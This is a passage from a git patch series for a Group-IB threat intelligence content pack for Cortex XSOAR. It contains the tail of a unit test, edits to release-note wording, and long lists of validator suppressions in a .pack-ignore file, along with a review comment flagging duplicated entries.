+ """ + mock_client.poller.create_search_generator.return_value = [ + MagicMock(parse_portion=lambda keys, as_json: [ + {"id": "123", "name": "Test Result"}, + {"id": "456", "name": "Another Result"}, + ]) + ] + + args = {"query": "test_query", "collection_name": "test_collection"} + + result = local_search_command(mock_client, args) + + assert isinstance(result, CommandResults) + assert result.outputs_prefix == "GIBTIA.search.local" + assert result.outputs_key_field == "id" + assert len(result.outputs) == 2 + assert result.outputs[0]["id"] == "123" + assert result.outputs[0]["additional_info"] == "Name: Test Result" + assert "Search results" in result.readable_output + assert "Name: Test Result" in result.readable_output + assert "Name: Another Result" in result.readable_output diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md index d4e40df691e5..7499ff84191c 100644 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md +++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md 
@@ -979,16 +979,16 @@
 - New: Added a new incident field- GIB Phishing Date Updated that support new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
--
-- ##### New: GIB Nation-State Cybercriminals Threat Actor Aliases
-- New: Added a new incident field- GIB Nation-State Cybercriminals Threat Actor Aliases that support new collections
+- ##### GIB Nation-State Cybercriminals Threat Actor Aliases
+
+- GIB Nation-State Cybercriminals Threat Actor Aliases supports new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
 -
-- ##### New: GIB Scanner Sources
+- ##### GIB Scanner Sources
-- New: Added a new incident field- GIB Scanner Sources that support new collections
+- GIB Scanner Sources now supports new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
@@ -996,7 +996,7 @@
 ##### New: GIB Cybercriminal Threat Actor
-- New: Added a new incident type- GIB Cybercriminal Threat Actor that support new collections
+- New: Added a new incident type- GIB Cybercriminal Threat Actor that supports new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
 ##### New: GIB Attacks Phishing Kit
From 4f7d86939dd196722491a6fdb046479f13ce48f3 Mon Sep 17 00:00:00 2001
From: Amichai
Date: Sun, 2 Feb 2025 13:26:42 +0200
Subject: [PATCH 8/9] Fix pack ignore
---
 Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index a00ee9ea7a07..96f9297a525f 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -292,9 +292,6 @@ ignore=IF115
 [file:incidentfield-GIB_Socks_Proxy_Source.json]
 ignore=IF115
-[file:incidentfield-GIB_Phishing_Date_Updated.json]
-ignore=IF115
-
 [file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Langs.json]
 ignore=IF115
@@ -384,7 +381,7 @@ ignore=GR103
 ignore=BA116
 [file:incidentfield-GIB_Phishing_Date_Updated.json]
-ignore=BA116
+ignore=BA116,IF115
 [file:layoutscontainer-GIB_OSI_Git_Leak_Layout.json]
 ignore=LO107
From 68be0c8b3f321c3a96c02f284ef05afd149d5ff0 Mon Sep 17 00:00:00 2001
From: Amichai
Date: Sun, 2 Feb 2025 14:06:16 +0200
Subject: [PATCH 9/9] Fix for docs and ignore
---
 .../.pack-ignore | 182 +++++++++++++++++-
 .../ReleaseNotes/2_0_0.md | 8 +-
 2 files changed, 182 insertions(+), 8 deletions(-)
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
index 96f9297a525f..a02071360f98 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/.pack-ignore
@@ -1,6 +1,9 @@
 [file:GroupIBTIA.yml]
 ignore=BA108,BA109,BC104,BC102,ST111,RM110
+[file:GroupIBTIA.yml]
+ignore=BA108,BA109,BC104,BC102,ST111,RM110
+
 [file:GroupIB_TIA_Feed.yml]
 ignore=BA108,BA109
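Review bot: The three lines added by `@@ -1,6 +1,9 @@` are a byte-for-byte copy of the `[file:GroupIBTIA.yml]` section that the two context lines directly above already contain, so the file ends up with two sections for the same file and the hunk should simply be dropped; depending on how the validator parses this file a duplicated section is either rejected or silently merged, and neither is intended. The following hunk (`@@ -331,8 +334,183 @@`) has the same problem on a smaller scale: `[file:incidentfield-GIB_Upload_Time.json]` with `ignore=IF115` is added twice, and there is a stray double blank line after `[file:incidentfield-GIB_Country_Name.json]`. Across this series well over fifty incident-field files now suppress IF115 and another batch suppress GR103 with no recorded reason; since each entry silences the content validator for every future change to that file, a sentence in the PR description stating why the checks do not apply would tell a later maintainer when the suppressions can be removed.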
@@ -331,8 +334,183 @@ ignore=IF115
 [file:incidentfield-GIB_Country_Code.json]
 ignore=IF115
+[file:incidentfield-GIB_Upload_Time.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_First_Compromised.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_Kit_Email.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Target_Domain.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Provider_Domain.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Regions.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Upload_Time.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Cybercriminal_Regions.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Expertises.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Reports_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Country_Name.json]
+ignore=IF115
+
+
+[file:incidentfield-GIB_Phishing_Objectives.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Target_Provider.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Date_End.json]
+ignore=IF115
+
+[file:incidentfield-GIB_CNC.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_Last_Compromised.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Organization_BSB.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Extended_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Extended_CVSS_Temporal.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Report_Number.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Target_Country_Name.json]
+ignore=IF115
+
+[file:incidentfield-GIB_GIB_Href.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Target_Region.json]
+ignore=IF115
+
+[file:incidentfield-GIB_GIB_Cybercriminal_Forums_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Proxy_Sources.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_Kit_Source.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Target_Port.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_IP_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Target_ASN.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_First_Seen.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Actor_Goals.json]
+ignore=IF115
+
+[file:incidentfield-GIB_CNC_Port.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Passwords.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Cybercriminal_Threat_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_Modified.json]
+ignore=IF115
+
+[file:incidentfield-GIB_VPN_Sources.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Phishing_Date_Detected.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Organization_CLABE.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_Add.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Malware_Platforms.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Proxy_Port.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Expertises.json]
+ignore=IF115
+
+[file:incidentfield-GIB_CNC_URL.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Compromised_Events_Information_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Is_Tailored.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_Incident.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Date_Published.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Date_Begin.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Request_Body.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Title.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Request_Headers_Hash.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Nation-State_Cybercriminals_Threat_Description.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Cybercriminal_Threat_Title.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Email_Domains.json]
+ignore=IF115
+
+[file:incidentfield-GIB_DDOS_Type.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Malware_Table.json]
+ignore=IF115
+
+[file:incidentfield-GIB_Parsed_Login_IP.json]
+ignore=IF115
+
 [file:incidentfield-GIB_Date_Updated_At.json]
-ignore=GR103
+ignore=GR103,IF115
 [file:incidentfield-GIB_Date_Expired.json]
 ignore=GR103
@@ -378,7 +556,7 @@ ignore=GR103
 ignore=GR103
 [file:incidentfield-GIB_Scanner_Sources.json]
-ignore=BA116
+ignore=BA116,IF115
 [file:incidentfield-GIB_Phishing_Date_Updated.json]
 ignore=BA116,IF115
diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
index 7499ff84191c..61937596eb74 100644
--- a/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
+++ b/Packs/GroupIB_ThreatIntelligenceAttribution/ReleaseNotes/2_0_0.md
@@ -855,11 +855,7 @@
 ##### GIB Phishing Kit Emails
 - Updated the GIB Phishing Kit Emails incident field to support new collections.
-##### New: CPE Table
-- New: Added a new incident field- CPE Table that support new collections
-<~XSIAM> (Available from Cortex XSIAM 2.0).
-<~XSOAR> (Available from Cortex XSOAR 6.10.0).
 ##### GIB Date Created
 - Updated the GIB Date Created incident field to support new collections.
@@ -980,13 +976,13 @@
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
-- ##### GIB Nation-State Cybercriminals Threat Actor Aliases
+##### GIB Nation-State Cybercriminals Threat Actor Aliases
 - GIB Nation-State Cybercriminals Threat Actor Aliases supports new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).
 <~XSOAR> (Available from Cortex XSOAR 6.10.0).
 -
-- ##### GIB Scanner Sources
+##### GIB Scanner Sources
 - GIB Scanner Sources now supports new collections
 <~XSIAM> (Available from Cortex XSIAM 2.0).